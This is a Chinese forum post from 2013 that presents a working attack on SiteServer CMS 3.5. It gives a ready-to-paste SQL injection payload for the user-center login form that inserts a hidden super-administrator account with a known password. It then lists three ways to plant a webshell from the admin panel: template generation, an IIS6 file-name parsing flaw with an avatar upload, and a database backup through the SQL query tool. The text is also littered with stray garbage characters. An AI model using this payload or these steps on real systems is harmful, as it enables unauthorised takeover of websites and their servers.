经测试秒杀最新的3.5版: Q: F& Z5 q. G. H/ f& S1 z, N B
stieserver官网:www.siteserver.cn
) b$ `7 k' l) t4 y3 jEXP:
" m9 j" K1 y9 }+ _# I直接访问UserCenter/login.aspx
. n1 a' Z3 _ }+ ^6 j/ @ S用户名处输入:+ G! A4 T q) Z) B5 E! A
$ [8 U* {' ^8 X, N
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–% x t$ X2 A' f
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。3 Z9 K) C# S5 o! Z2 l
之后再访问后台SiteServer/login.aspx用插入的用户登陆
; |; \- _: D. z4 @后台拿webshell的三种方法:6 M& \& z, P m7 l
一、4 J8 T+ G" [' f0 x9 n
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx8 N# D8 x- w5 ^
二、
4 @ G: w8 V2 Z. o) K2 D5 M成员权限-》添加用户-》用户名为:1.asp; d" p/ R6 a' x* d' \
http://127.0.0.1/usercenter/
( t% K! _6 E8 u3 B) n3 m用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 j( I& n* \# Q- y% o1 f+ S% Y* l/ X(ps:后台添加用户时不会验证是否含有非法字符)8 ~7 M N; j" E# Q- u
三、7 S, Y6 f1 s8 e# M
系统工具-》实用工具-》机器参数查看2 v8 z3 f0 j. B; B) K% [
可以看到数据库类型、名称,WEB路径* X6 w$ _5 ?- H( |9 [5 ^
系统工具-》数据库工具-》SQL语句查询9 f% Y$ g+ ?! f- ~' Z
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对